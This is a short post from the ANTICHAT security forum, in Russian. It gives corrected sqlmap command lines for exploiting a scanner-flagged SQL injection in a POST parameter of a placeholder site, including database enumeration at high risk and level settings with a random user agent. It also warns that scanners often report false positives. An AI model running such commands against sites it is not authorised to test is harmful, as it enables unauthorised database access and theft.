ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #2  
Старый 19.01.2020, 14:41
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Цитата:
Сообщение от qwerty1qwerty  

Сканер показал что в параметре random есть иньекция. Смотрю исходник где показал вроде как есть. Но Не работает map, и выдает странную ошибку.Впервые такое,гугл не помог. Что я не так делаю???

-u
https://site.com
--data "code=94102&month=01&random=%5c&year=2015&_token=A mkrx5wyiyqwZKS0sJgkFKIqylbSCE61TpRgo8ME" -p "random" --method POST --risk=3 --random-agent
--url "https://site.com" --data="code=94102&month=01&random=*&year=2015&_toke n=Amkrx5wyiyqwZKS0sJgkFKIqylbSCE61TpRgo8ME" --dbs --risk=3 --level=3 --dbms=mysql(или что там у тебя) --random-agent

B сканерам верить такое себе, часто просто ложное срабатывание. Подозреваю что токен валидный нужен
 
Ответить с цитированием
 



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.